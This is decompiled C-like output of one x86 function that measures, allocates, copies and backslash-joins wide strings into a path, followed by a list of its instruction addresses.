				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				unsigned int _t267;
				signed int _t272;
				signed int _t277;
				unsigned int _t283;
				signed int _t284;
				signed int* _t286;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t304;
				unsigned int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t312;
				signed int _t313;
				signed int _t316;
				signed int _t317;
				unsigned int _t326;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				void* _t331;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				unsigned int _t341;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t351;
				signed int _t354;
				signed int _t355;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				unsigned int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t374;
				void* _t382;
				signed int _t384;
				signed int _t385;
				signed int _t389;
				signed int _t390;
				unsigned int _t405;
				signed int _t406;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed short* _t414;
				signed int _t418;
				unsigned int _t419;
				signed int _t421;
				unsigned int _t429;
				void* _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int* _t445;
				unsigned int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t458;
				signed int _t465;
				unsigned int _t467;
				signed int _t468;
				signed int _t471;
				void* _t473;
				void* _t474;

				_t473 = (_t471 & 0xfffffff0) - 0x34;
				E0041D980(__ecx,  &_v60, 0x2f);
				_t294 = E0041E7D0( &_v60);
				_t445 = _a4;
				_t316 =  *_t294;
				if(_t316 != 0) {
					_t364 =  *( *( *(_t294 + 4)));
					__eflags = _t364;
					if(_t364 == 0) {
						L37:
						_push(0x80);
						_t418 = E00411030();
						_t473 = _t473 + 4;
						 *_t418 = 0;
						__eflags =  *_t294 - 1;
						if( *_t294 <= 1) {
							L70:
							 *_t445 = 0;
							_t445[1] = 0;
							__eflags = _t418;
							if(_t418 == 0) {
								L105:
								_push(0x80);
								_t295 = E00411030();
								_t473 = _t473 + 4;
								_t317 =  *_t445;
								__eflags = _t317;
								if(_t317 == 0) {
									__eflags = 0;
									 *_t295 = 0;
									L113:
									 *_t445 = _t295;
									_t445[1] = 0x40;
									L114:
									_push(2);
									_push(_t418);
									E004110B0();
									_t474 = _t473 + 8;
									L115:
									_t419 = _v60;
									_v60 = 0;
									_v52 = 0;
									_t369 = _v56;
									if(_t419 <= 0) {
										L127:
										_push(4);
										_push(_t369);
										E004110B0();
										_v56 = 0;
										return _t445;
									}
									_t225 = _t419 >> 1;
									if(_t225 == 0) {
										_t297 = 1;
										L124:
										if(_t297 - 1 < _t419) {
											_t319 =  *((intOrPtr*)(_t369 + _t297 * 4 - 4));
											if( *((intOrPtr*)(_t369 + _t297 * 4 - 4)) != 0) {
												_push(1);
												E004187E0(_t319);
												_t369 = _v60;
											}
										}
										goto L127;
									}
									_t298 = 0;
									_t447 = _t225;
									do {
										_t320 =  *((intOrPtr*)(_t369 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + _t298 * 8)) != 0) {
											_push(1);
											E004187E0(_t320);
											_t369 = _v60;
										}
										_t321 =  *((intOrPtr*)(_t369 + 4 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + 4 + _t298 * 8)) != 0) {
											_push(1);
											E004187E0(_t321);
											_t369 = _v60;
										}
										_t298 = _t298 + 1;
									} while (_t298 < _t447);
									_t445 = _a4;
									_t297 = _t298 + _t298 + 1;
									goto L124;
								}
								__eflags = _t295;
								if(_t295 == 0) {
									L111:
									_push(2);
									_push(_t317);
									E004110B0();
									_t473 = _t473 + 8;
									goto L113;
								}
								_t370 =  *_t317 & 0x0000ffff;
								 *_t295 = _t370;
								__eflags = _t370;
								if(_t370 == 0) {
									goto L111;
								}
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_t371 = _t371 + 1;
									_t230 =  *(_t317 + _t371 * 4 - 2) & 0x0000ffff;
									 *(_t295 + _t371 * 4 - 2) = _t230;
									__eflags = _t230;
									if(_t230 == 0) {
										goto L111;
									}
									_t231 =  *(_t317 + _t371 * 4) & 0x0000ffff;
									 *(_t295 + _t371 * 4) = _t231;
									__eflags = _t231;
									if(_t231 != 0) {
										continue;
									}
									goto L111;
								}
								goto L111;
							}
							L71:
							__eflags =  *_t418 & 0x0000ffff;
							if(( *_t418 & 0x0000ffff) == 0) {
								goto L105;
							}
							_t374 = _t418 & 0x0000000f;
							__eflags = _t374;
							if(_t374 == 0) {
								L77:
								asm("pxor xmm0, xmm0");
								_t304 =  ~( ~_t374 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t304;
								while(1) {
									asm("movdqu xmm1, [edi+edx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb ecx, xmm1");
									__eflags = _t316;
									if(_t316 != 0) {
										break;
									}
									_t374 = _t374 + 8;
									__eflags = _t374 - _t304;
									if(_t374 < _t304) {
										continue;
									}
									__eflags = _t304 - 0x7fffffff;
									if(_t304 >= 0x7fffffff) {
										L83:
										_t304 = 0x7fffffff;
										L84:
										_t82 = _t304 + 1; // 0x80000000
										_t232 = _t82;
										__eflags = _t232 - 0x40;
										_t233 =  <=  ? 0x40 : _t232;
										__eflags = _t233;
										if(_t233 > 0) {
											_t326 = (_t233 >> 5 >> 0x1a) + _t233 >> 6;
											_t234 = _t233 & 0x8000003f;
											__eflags = _t234;
											if(_t234 < 0) {
												_t234 = (_t234 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t234;
											}
											__eflags = _t234;
											_t327 = _t326 + (0 | _t234 > 0x00000000);
											_v64 = _t327 << 6;
											_push(_t327 << 7);
											_t235 = E00411030();
											_t473 = _t473 + 4;
											_t329 =  *_t445;
											__eflags = _t329;
											if(_t329 == 0) {
												__eflags = 0;
												 *_t235 = 0;
												goto L97;
											} else {
												__eflags = _t235;
												if(_t235 == 0) {
													L95:
													_push(2);
													_push(_t329);
													_v68 = _t235;
													E004110B0();
													_t235 = _v68;
													_t473 = _t473 + 8;
													L97:
													_t445[1] = _v64;
													 *_t445 = _t235;
													L98:
													_t330 = _t418;
													__eflags = _t235;
													if(_t235 == 0) {
														goto L114;
													}
													_t382 = 0;
													while(1) {
														_t448 =  *_t330 & 0x0000ffff;
														_t382 = _t382 + 1;
														 *_t235 = _t448;
														__eflags = _t304;
														if(_t304 == 0) {
															goto L103;
														}
														__eflags = _t382 - _t304;
														if(_t382 == _t304) {
															_t445 = _a4;
															 *(_t235 + 2) = 0;
															goto L114;
														}
														L103:
														__eflags = _t448;
														if(_t448 == 0) {
															_t445 = _a4;
															goto L114;
														}
														_t235 = _t235 + 2;
														_t330 = _t330 + 2;
														__eflags = _t330;
													}
												}
												_t384 =  *_t329 & 0x0000ffff;
												 *_t235 = _t384;
												__eflags = _t384;
												if(_t384 == 0) {
													goto L95;
												}
												_t385 = 0;
												__eflags = 0;
												while(1) {
													_t385 = _t385 + 1;
													_t449 =  *(_t329 + _t385 * 4 - 2) & 0x0000ffff;
													 *(_t235 + _t385 * 4 - 2) = _t449;
													__eflags = _t449;
													if(_t449 == 0) {
														break;
													}
													_t450 =  *(_t329 + _t385 * 4) & 0x0000ffff;
													 *(_t235 + _t385 * 4) = _t450;
													__eflags = _t450;
													if(_t450 != 0) {
														continue;
													}
													break;
												}
												_t445 = _a4;
												goto L95;
											}
										}
										_t235 = 0;
										goto L98;
									} else {
										goto L81;
									}
									while(1) {
										L81:
										__eflags =  *(_t418 + _t304 * 2) & 0x0000ffff;
										if(( *(_t418 + _t304 * 2) & 0x0000ffff) == 0) {
											goto L84;
										}
										_t304 = _t304 + 1;
										__eflags = _t304 - 0x7fffffff;
										if(_t304 < 0x7fffffff) {
											continue;
										}
										goto L83;
									}
									goto L84;
								}
								asm("bsf ebx, ecx");
								_t304 = (_t304 >> 1) + _t374;
								goto L84;
							}
							_t304 = 0;
							__eflags = _t374 & 0x00000001;
							if((_t374 & 0x00000001) != 0) {
								goto L81;
							}
							_t374 =  ~_t374 + 0x10 >> 1;
							__eflags = _t374;
							while(1) {
								_t316 =  *(_t418 + _t304 * 2) & 0x0000ffff;
								__eflags = _t316;
								if(_t316 == 0) {
									goto L84;
								}
								_t304 = _t304 + 1;
								__eflags = _t304 - _t374;
								if(_t304 < _t374) {
									continue;
								}
								goto L77;
							}
							goto L84;
						}
						_v40 = 0x40;
						L39:
						__eflags = 1;
						_t389 = 1;
						_t241 = _t294;
						asm("pxor xmm0, xmm0");
						_t306 = 1;
						do {
							__eflags = _t418;
							if(_t418 == 0) {
								_t390 = 0;
								L205:
								_v32 = _t241;
								_t451 = _t390;
								L54:
								_t48 = _t451 + 2; // -2147483652
								_t331 = _t48;
								__eflags = _t331 - 0x40;
								_t332 =  <=  ? 0x40 : _t331;
								__eflags = _t332 - _v40;
								if(_t332 <= _v40) {
									L66:
									_t316 = 0;
									 *((short*)(_t418 + _t451 * 2)) = 0x5c;
									 *((short*)(_t418 + 2 + _t451 * 2)) = 0;
									_t452 = _v32;
									_t389 =  *( *( *((intOrPtr*)(_t452 + 4)) + _t306 * 4));
									__eflags = _t389;
									if(_t389 == 0) {
										goto L68;
									}
									_t316 =  *_t389 & 0x0000ffff;
									__eflags = _t316;
									if(_t316 != 0) {
										__eflags = _t389 - _t418;
										if(_t389 == _t418) {
											goto L68;
										}
										_t245 = _t389 & 0x0000000f;
										__eflags = _t245;
										if(_t245 == 0) {
											L134:
											asm("pxor xmm1, xmm1");
											_t465 =  ~( ~_t245 + 0x00000007 & 0x00000007) + 0x7fffffff;
											__eflags = _t465;
											while(1) {
												asm("movdqu xmm0, [edx+eax*2]");
												asm("pcmpeqw xmm0, xmm1");
												asm("pmovmskb ecx, xmm0");
												__eflags = _t316;
												if(_t316 != 0) {
													break;
												}
												_t245 = _t245 + 8;
												__eflags = _t245 - _t465;
												if(_t245 < _t465) {
													continue;
												}
												__eflags = _t465 - 0x7fffffff;
												if(_t465 >= 0x7fffffff) {
													L140:
													_t465 = 0x7fffffff;
													L141:
													__eflags = _t418;
													if(_t418 == 0) {
														_t246 = 0;
														L155:
														_t149 = _t246 + 1; // 0x80000000
														_t247 = _t465 + _t149;
														__eflags = _t247;
														if(_t247 != 0) {
															__eflags = _t247 - 0x40;
															_t248 =  <=  ? 0x40 : _t247;
															__eflags = _t248 - _v40;
															if(_t248 <= _v40) {
																L173:
																_t249 = _t418;
																__eflags = _t418;
																if(_t418 == 0) {
																	L204:
																	_t241 = _v32;
																	_t390 = 0;
																	_t306 = _t306 + 1;
																	__eflags = _t306 -  *_t241;
																	if(_t306 >=  *_t241) {
																		_t445 = _a4;
																		 *_t445 = 0;
																		_t445[1] = 0;
																		goto L105;
																	}
																	goto L205;
																}
																_t334 =  *_t418 & 0x0000ffff;
																L175:
																__eflags = _t334;
																if(_t334 == 0) {
																	L180:
																	_t335 = _t249;
																	__eflags = _t465;
																	if(__eflags != 0) {
																		if(__eflags <= 0) {
																			L187:
																			_t316 = _v32;
																			_t389 = 0;
																			 *_t249 = 0;
																			_t306 = _t306 + 1;
																			__eflags = _t306 -  *_t316;
																			if(_t306 <  *_t316) {
																				L42:
																				_t243 = _t418 & 0x0000000f;
																				__eflags = _t243;
																				if(_t243 == 0) {
																					L47:
																					asm("pxor xmm1, xmm1");
																					_t458 =  ~( ~_t243 + 0x00000007 & 0x00000007) + 0x7fffffff;
																					__eflags = _t458;
																					while(1) {
																						asm("movdqu xmm0, [edi+eax*2]");
																						asm("pcmpeqw xmm0, xmm1");
																						asm("pmovmskb edx, xmm0");
																						__eflags = _t389;
																						if(_t389 != 0) {
																							break;
																						}
																						_t243 = _t243 + 8;
																						__eflags = _t243 - _t458;
																						if(_t243 < _t458) {
																							continue;
																						}
																						__eflags = _t458 - 0x7fffffff;
																						if(_t458 >= 0x7fffffff) {
																							L53:
																							_t451 = 0x7fffffff;
																							goto L54;
																						} else {
																							goto L51;
																						}
																						while(1) {
																							L51:
																							__eflags =  *(_t418 + _t458 * 2) & 0x0000ffff;
																							if(( *(_t418 + _t458 * 2) & 0x0000ffff) == 0) {
																								break;
																							}
																							_t458 = _t458 + 1;
																							__eflags = _t458 - 0x7fffffff;
																							if(_t458 < 0x7fffffff) {
																								continue;
																							}
																							goto L53;
																						}
																						L196:
																						__eflags = _t451 - 0xfffffffe;
																						if(_t451 == 0xfffffffe) {
																							 *_t418 = 0;
																						}
																						goto L54;
																					}
																					asm("bsf esi, edx");
																					_t451 = (_t458 >> 1) + _t243;
																					goto L196;
																				}
																				_t458 = 0;
																				__eflags = _t243 & 0x00000001;
																				if((_t243 & 0x00000001) != 0) {
																					goto L51;
																				}
																				_t243 =  ~_t243 + 0x10 >> 1;
																				__eflags = _t243;
																				while(1) {
																					_t389 =  *(_t418 + _t458 * 2) & 0x0000ffff;
																					__eflags = _t389;
																					if(_t389 == 0) {
																						goto L196;
																					}
																					_t458 = _t458 + 1;
																					__eflags = _t458 - _t243;
																					if(_t458 < _t243) {
																						continue;
																					}
																					goto L47;
																				}
																				goto L196;
																			}
																			_t445 = _a4;
																			L192:
																			 *_t445 = 0;
																			_t445[1] = 0;
																			goto L71;
																		}
																		L183:
																		_v48 = 0;
																		_v44 = _t418;
																		_v28 = _t306;
																		_t421 = _v48;
																		while(1) {
																			_t307 =  *(_t389 + _t421 * 2) & 0x0000ffff;
																			 *(_t335 + _t421 * 2) = _t307;
																			__eflags = _t307;
																			if(_t307 == 0) {
																				break;
																			}
																			_t190 = _t421 * 2; // 0x2
																			_t249 = _t335 + _t190 + 2;
																			_t421 = _t421 + 1;
																			__eflags = _t421 - _t465;
																			if(_t421 < _t465) {
																				continue;
																			}
																			break;
																		}
																		_t306 = _v28;
																		_t418 = _v44;
																		goto L187;
																	}
																	_t465 = 0x7fffffff;
																	goto L183;
																}
																_v36 = _t389;
																_t336 = 0;
																__eflags = 0;
																_v28 = _t306;
																while(1) {
																	_t336 = _t336 + 1;
																	_t308 = _t418 + _t336 * 4;
																	_t249 = _t308 - 2;
																	__eflags =  *(_t308 - 2) & 0x0000ffff;
																	if(( *(_t308 - 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	_t249 = _t308;
																	__eflags =  *_t308 & 0x0000ffff;
																	if(( *_t308 & 0x0000ffff) != 0) {
																		continue;
																	}
																	break;
																}
																_t389 = _v36;
																_t306 = _v28;
																goto L180;
															}
															L161:
															_t341 = (_t248 >> 5 >> 0x1a) + _t248 >> 6;
															_t250 = _t248 & 0x8000003f;
															__eflags = _t250;
															if(_t250 < 0) {
																_t250 = (_t250 - 0x00000001 | 0xffffffc0) + 1;
																__eflags = _t250;
															}
															__eflags = _t250;
															_t342 = _t341 + (0 | _t250 > 0x00000000);
															_v40 = _t342 << 6;
															_push(_t342 << 7);
															_v36 = _t389;
															_t255 = E00411030();
															_t389 = _v36;
															_t344 = _t255;
															_t473 = _t473 + 4;
															__eflags = _t418;
															if(_t418 == 0) {
																__eflags = 0;
																 *_t344 = 0;
																goto L172;
															} else {
																__eflags = _t344;
																if(_t344 == 0) {
																	L170:
																	_push(2);
																	_push(_t418);
																	_v68 = _t344;
																	_v36 = _t389;
																	E004110B0();
																	_t389 = _v36;
																	_t344 = _v68;
																	_t473 = _t473 + 8;
																	L172:
																	_t418 = _t344;
																	goto L173;
																}
																_t257 =  *_t418 & 0x0000ffff;
																 *_t344 = _t257;
																__eflags = _t257;
																if(_t257 == 0) {
																	goto L170;
																}
																_v28 = _t306;
																_t258 = 0;
																__eflags = 0;
																while(1) {
																	_t258 = _t258 + 1;
																	_t309 =  *(_t418 + _t258 * 4 - 2) & 0x0000ffff;
																	 *(_t344 + _t258 * 4 - 2) = _t309;
																	__eflags = _t309;
																	if(_t309 == 0) {
																		break;
																	}
																	_t310 =  *(_t418 + _t258 * 4) & 0x0000ffff;
																	 *(_t344 + _t258 * 4) = _t310;
																	__eflags = _t310;
																	if(_t310 != 0) {
																		continue;
																	}
																	break;
																}
																_t306 = _v28;
																goto L170;
															}
														}
														__eflags = _t418;
														if(_t418 == 0) {
															__eflags = _v40 - 0x40;
															if(_v40 < 0x40) {
																L159:
																_t248 = 0x40;
																goto L161;
															}
															goto L204;
														}
														_t334 = 0;
														 *_t418 = 0;
														__eflags = _v40 - 0x40;
														if(_v40 < 0x40) {
															goto L159;
														}
														_t249 = _t418;
														goto L175;
													}
													_t346 = _t418 & 0x0000000f;
													__eflags = _t346;
													if(_t346 == 0) {
														L148:
														asm("pxor xmm1, xmm1");
														_v28 = _t306;
														_t246 =  ~( ~_t346 + 0x00000007 & 0x00000007) + 0x7fffffff;
														__eflags = _t246;
														while(1) {
															asm("movdqu xmm0, [edi+ecx*2]");
															asm("pcmpeqw xmm0, xmm1");
															asm("pmovmskb ebx, xmm0");
															__eflags = _t306;
															if(_t306 != 0) {
																break;
															}
															_t346 = _t346 + 8;
															__eflags = _t346 - _t246;
															if(_t346 < _t246) {
																continue;
															}
															_t306 = _v28;
															__eflags = _t246 - 0x7fffffff;
															if(_t246 >= 0x7fffffff) {
																L154:
																_t246 = 0x7fffffff;
																goto L155;
															} else {
																goto L152;
															}
															while(1) {
																L152:
																__eflags =  *(_t418 + _t246 * 2) & 0x0000ffff;
																if(( *(_t418 + _t246 * 2) & 0x0000ffff) == 0) {
																	goto L155;
																}
																_t246 = _t246 + 1;
																__eflags = _t246 - 0x7fffffff;
																if(_t246 < 0x7fffffff) {
																	continue;
																}
																goto L154;
															}
															goto L155;
														}
														asm("bsf eax, eax");
														_t267 = _t306 >> 1;
														_t306 = _v28;
														_t246 = _t267 + _t346;
														goto L155;
													}
													_t246 = 0;
													__eflags = _t346 & 0x00000001;
													if((_t346 & 0x00000001) != 0) {
														goto L152;
													}
													_t346 =  ~_t346 + 0x10 >> 1;
													__eflags = _t346;
													_v28 = _t306;
													while(1) {
														__eflags =  *(_t418 + _t246 * 2) & 0x0000ffff;
														if(( *(_t418 + _t246 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t246 = _t246 + 1;
														__eflags = _t246 - _t346;
														if(_t246 < _t346) {
															continue;
														}
														_t306 = _v28;
														goto L148;
													}
													_t306 = _v28;
													goto L155;
												} else {
													goto L138;
												}
												while(1) {
													L138:
													__eflags =  *(_t389 + _t465 * 2) & 0x0000ffff;
													if(( *(_t389 + _t465 * 2) & 0x0000ffff) == 0) {
														goto L141;
													}
													_t465 = _t465 + 1;
													__eflags = _t465 - 0x7fffffff;
													if(_t465 < 0x7fffffff) {
														continue;
													}
													goto L140;
												}
												goto L141;
											}
											asm("bsf esi, ecx");
											_t465 = (_t465 >> 1) + _t245;
											goto L141;
										}
										_t465 = 0;
										__eflags = _t245 & 0x00000001;
										if((_t245 & 0x00000001) != 0) {
											goto L138;
										}
										_t245 =  ~_t245 + 0x10 >> 1;
										__eflags = _t245;
										while(1) {
											_t316 =  *(_t389 + _t465 * 2) & 0x0000ffff;
											__eflags = _t316;
											if(_t316 == 0) {
												goto L141;
											}
											_t465 = _t465 + 1;
											__eflags = _t465 - _t245;
											if(_t465 < _t245) {
												continue;
											}
											goto L134;
										}
										goto L141;
									}
									goto L68;
								}
								_t405 = (_t332 >> 5 >> 0x1a) + _t332 >> 6;
								_t351 = _t332 & 0x8000003f;
								__eflags = _t351;
								if(_t351 < 0) {
									_t351 = (_t351 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t351;
								}
								__eflags = _t351;
								_t406 = _t405 + (0 | _t351 > 0x00000000);
								_v40 = _t406 << 6;
								_push(_t406 << 7);
								_t272 = E00411030();
								_t473 = _t473 + 4;
								__eflags = _t418;
								if(_t418 == 0) {
									__eflags = 0;
									 *_t272 = 0;
									goto L65;
								} else {
									__eflags = _t272;
									if(_t272 == 0) {
										L63:
										_push(2);
										_push(_t418);
										_v64 = _t272;
										E004110B0();
										_t272 = _v64;
										_t473 = _t473 + 8;
										L65:
										_t418 = _t272;
										goto L66;
									}
									_t409 =  *_t418 & 0x0000ffff;
									 *_t272 = _t409;
									__eflags = _t409;
									if(_t409 == 0) {
										goto L63;
									}
									_t410 = 0;
									__eflags = 0;
									while(1) {
										_t410 = _t410 + 1;
										_t354 =  *(_t418 + _t410 * 4 - 2) & 0x0000ffff;
										 *(_t272 + _t410 * 4 - 2) = _t354;
										__eflags = _t354;
										if(_t354 == 0) {
											goto L63;
										}
										_t355 =  *(_t418 + _t410 * 4) & 0x0000ffff;
										 *(_t272 + _t410 * 4) = _t355;
										__eflags = _t355;
										if(_t355 != 0) {
											continue;
										}
										goto L63;
									}
									goto L63;
								}
							}
							_v32 = _t241;
							goto L42;
							L68:
							_t241 = _t452;
							_t306 = _t306 + 1;
							__eflags = _t306 -  *_t241;
						} while (_t306 <  *_t241);
						_t445 = _a4;
						goto L70;
					}
					__eflags =  *_t364 & 0x0000ffff;
					if(( *_t364 & 0x0000ffff) == 0) {
						goto L37;
					}
					_t277 = _t364 & 0x0000000f;
					__eflags = _t277;
					if(_t277 == 0) {
						L18:
						asm("pxor xmm0, xmm0");
						_t429 =  ~( ~_t277 + 0x00000007 & 0x00000007) + 0x7fffffff;
						__eflags = _t429;
						_v64 = _t429;
						_t467 = _t429;
						while(1) {
							asm("movdqu xmm1, [edx+eax*2]");
							asm("pcmpeqw xmm1, xmm0");
							asm("pmovmskb edi, xmm1");
							__eflags = _t429;
							if(_t429 != 0) {
								break;
							}
							_t277 = _t277 + 8;
							__eflags = _t277 - _t467;
							if(_t277 < _t467) {
								continue;
							}
							_v64 = _t467;
							_t445 = _a4;
							__eflags = _v64 - 0x7fffffff;
							if(_v64 >= 0x7fffffff) {
								L25:
								_v64 = 0x7fffffff;
								L26:
								_t433 = _v64 + 1;
								__eflags = _t433 - 0x40;
								_t434 =  <=  ? 0x40 : _t433;
								__eflags = _t434;
								if(_t434 > 0) {
									_t283 = (_t434 >> 5 >> 0x1a) + _t434 >> 6;
									_t435 = _t434 & 0x8000003f;
									__eflags = _t435;
									if(_t435 < 0) {
										_t435 = (_t435 - 0x00000001 | 0xffffffc0) + 1;
										__eflags = _t435;
									}
									__eflags = _t435;
									_t284 = _t283 + (0 | _t435 > 0x00000000);
									_v40 = _t284 << 6;
									_push(_t284 << 7);
									_v68 = _t364;
									_t286 = E00411030();
									_t411 = _v68;
									_t473 = _t473 + 4;
									_t418 = _t286;
									 *_t286 = 0;
									_v32 = _t294;
									_t468 = _v64;
									while(1) {
										_t312 =  *_t411 & 0x0000ffff;
										_t316 = 1;
										 *_t286 = _t312;
										__eflags = _t468;
										if(_t468 == 0) {
											goto L35;
										}
										__eflags = 1 - _t468;
										if(1 == _t468) {
											__eflags = 0;
											_t445 = _a4;
											_t294 = _v32;
											_t286[0] = 0;
											L191:
											__eflags =  *_t294 - 1;
											if( *_t294 > 1) {
												goto L39;
											}
											goto L192;
										}
										L35:
										__eflags = _t312;
										if(_t312 == 0) {
											_t445 = _a4;
											_t294 = _v32;
											goto L191;
										}
										_t286 =  &(_t286[0]);
										_t411 = _t411 + 2;
										__eflags = _t411;
									}
								}
								_t418 = 0;
								__eflags = _t316 - 1;
								if(_t316 <= 1) {
									goto L70;
								}
								_v40 = 0;
								goto L39;
							}
							L22:
							_t287 = _v64;
							while(1) {
								__eflags =  *(_t364 + _t287 * 2) & 0x0000ffff;
								if(( *(_t364 + _t287 * 2) & 0x0000ffff) == 0) {
									break;
								}
								_t287 = _t287 + 1;
								__eflags = _t287 - 0x7fffffff;
								if(_t287 < 0x7fffffff) {
									continue;
								}
								goto L25;
							}
							_v64 = _t287;
							goto L26;
						}
						asm("bsf edi, edi");
						_t445 = _a4;
						_v64 = (_t429 >> 1) + _t277;
						goto L26;
					}
					_t441 = 0;
					_v64 = 0;
					__eflags = _t277 & 0x00000001;
					if((_t277 & 0x00000001) != 0) {
						goto L22;
					}
					_t277 =  ~_t277 + 0x10 >> 1;
					__eflags = _t277;
					while(1) {
						__eflags =  *(_t364 + _t441 * 2) & 0x0000ffff;
						if(( *(_t364 + _t441 * 2) & 0x0000ffff) == 0) {
							break;
						}
						_t441 = _t441 + 1;
						__eflags = _t441 - _t277;
						if(_t441 < _t277) {
							continue;
						}
						goto L18;
					}
					_v64 = _t441;
					_t445 = _a4;
					goto L26;
				}
				_push(0x80);
				 *_t445 = 0;
				_t445[1] = 0;
				_t313 = E00411030();
				_t474 = _t473 + 4;
				_t414 =  *_t445;
				if(_t414 == 0) {
					__eflags = 0;
					 *_t313 = 0;
					L9:
					 *_t445 = _t313;
					_t445[1] = 0x40;
					goto L115;
				}
				if(_t313 == 0) {
					L7:
					_push(2);
					_push(_t414);
					E004110B0();
					_t474 = _t474 + 8;
					goto L9;
				}
				_t361 =  *_t414 & 0x0000ffff;
				 *_t313 = _t361;
				if(_t361 == 0) {
					goto L7;
				}
				_t362 = 0;
				while(1) {
					_t362 = _t362 + 1;
					_t442 =  *(_t414 + _t362 * 4 - 2) & 0x0000ffff;
					 *(_t313 + _t362 * 4 - 2) = _t442;
					if(_t442 == 0) {
						goto L7;
					}
					_t443 =  *(_t414 + _t362 * 4) & 0x0000ffff;
					 *(_t313 + _t362 * 4) = _t443;
					if(_t443 != 0) {
						continue;
					}
					goto L7;
				}
				goto L7;
			}

0x0041d039
0x0041d043
0x0041d04f
0x0041d051
0x0041d054
0x0041d058
0x0041d0c6
0x0041d0c8
0x0041d0ca
0x0041d214
0x0041d214
0x0041d21e
0x0041d220
0x0041d225
0x0041d228
0x0041d22b
0x0041d3a1
0x0041d3a3
0x0041d3a5
0x0041d3a8
0x0041d3aa
0x0041d507
0x0041d507
0x0041d511
0x0041d513
0x0041d516
0x0041d518
0x0041d51a
0x0041d554
0x0041d556
0x0041d559
0x0041d559
0x0041d55b
0x0041d562
0x0041d562
0x0041d564
0x0041d565
0x0041d56a
0x0041d56d
0x0041d56d
0x0041d573
0x0041d577
0x0041d57b
0x0041d581
0x0041d5dc
0x0041d5dc
0x0041d5de
0x0041d5df
0x0041d5e7
0x0041d5fa
0x0041d5fa
0x0041d585
0x0041d587
0x0041d8fb
0x0041d5c2
0x0041d5c7
0x0041d5c9
0x0041d5cf
0x0041d5d1
0x0041d5d3
0x0041d5d8
0x0041d5d8
0x0041d5cf
0x00000000
0x0041d5c7
0x0041d58d
0x0041d58f
0x0041d591
0x0041d591
0x0041d596
0x0041d598
0x0041d59a
0x0041d59f
0x0041d59f
0x0041d5a3
0x0041d5a9
0x0041d5ab
0x0041d5ad
0x0041d5b2
0x0041d5b2
0x0041d5b6
0x0041d5b7
0x0041d5bb
0x0041d5be
0x00000000
0x0041d5be
0x0041d51c
0x0041d51e
0x0041d547
0x0041d547
0x0041d549
0x0041d54a
0x0041d54f
0x00000000
0x0041d54f
0x0041d520
0x0041d523
0x0041d526
0x0041d528
0x00000000
0x00000000
0x0041d52a
0x0041d52a
0x0041d52c
0x0041d52c
0x0041d52d
0x0041d532
0x0041d537
0x0041d539
0x00000000
0x00000000
0x0041d53b
0x0041d53f
0x0041d543
0x0041d545
0x00000000
0x00000000
0x00000000
0x0041d545
0x00000000
0x0041d52c
0x0041d3b0
0x0041d3b3
0x0041d3b5
0x00000000
0x00000000
0x0041d3bd
0x0041d3bd
0x0041d3c0
0x0041d3dd
0x0041d3e1
0x0041d3ed
0x0041d3ed
0x0041d3f3
0x0041d3f3
0x0041d3f8
0x0041d3fc
0x0041d400
0x0041d402
0x00000000
0x00000000
0x0041d408
0x0041d40b
0x0041d40d
0x00000000
0x00000000
0x0041d40f
0x0041d415
0x0041d428
0x0041d428
0x0041d42d
0x0041d432
0x0041d432
0x0041d435
0x0041d438
0x0041d43b
0x0041d43d
0x0041d450
0x0041d453
0x0041d453
0x0041d458
0x0041d460
0x0041d460
0x0041d460
0x0041d463
0x0041d468
0x0041d472
0x0041d476
0x0041d477
0x0041d47c
0x0041d47f
0x0041d481
0x0041d483
0x0041d4c8
0x0041d4ca
0x00000000
0x0041d485
0x0041d485
0x0041d487
0x0041d4b3
0x0041d4b3
0x0041d4b5
0x0041d4b6
0x0041d4ba
0x0041d4bf
0x0041d4c3
0x0041d4cd
0x0041d4d1
0x0041d4d4
0x0041d4d6
0x0041d4d6
0x0041d4d8
0x0041d4da
0x00000000
0x00000000
0x0041d4e0
0x0041d4ea
0x0041d4ea
0x0041d4ed
0x0041d4ee
0x0041d4f1
0x0041d4f3
0x00000000
0x00000000
0x0041d4f5
0x0041d4f7
0x0041d8db
0x0041d8de
0x00000000
0x0041d8de
0x0041d4fd
0x0041d4fd
0x0041d4ff
0x0041d8e7
0x00000000
0x0041d8e7
0x0041d4e4
0x0041d4e7
0x0041d4e7
0x0041d4e7
0x0041d4ea
0x0041d489
0x0041d48c
0x0041d48f
0x0041d491
0x00000000
0x00000000
0x0041d493
0x0041d493
0x0041d495
0x0041d495
0x0041d496
0x0041d49b
0x0041d4a0
0x0041d4a2
0x00000000
0x00000000
0x0041d4a4
0x0041d4a8
0x0041d4ac
0x0041d4ae
0x00000000
0x00000000
0x00000000
0x0041d4ae
0x0041d4b0
0x00000000
0x0041d4b0
0x0041d483
0x0041d43f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d417
0x0041d417
0x0041d41b
0x0041d41d
0x00000000
0x00000000
0x0041d41f
0x0041d420
0x0041d426
0x00000000
0x00000000
0x00000000
0x0041d426
0x00000000
0x0041d417
0x0041d8ef
0x0041d8f4
0x00000000
0x0041d8f4
0x0041d3c2
0x0041d3c4
0x0041d3c7
0x00000000
0x00000000
0x0041d3ce
0x0041d3ce
0x0041d3d0
0x0041d3d0
0x0041d3d4
0x0041d3d6
0x00000000
0x00000000
0x0041d3d8
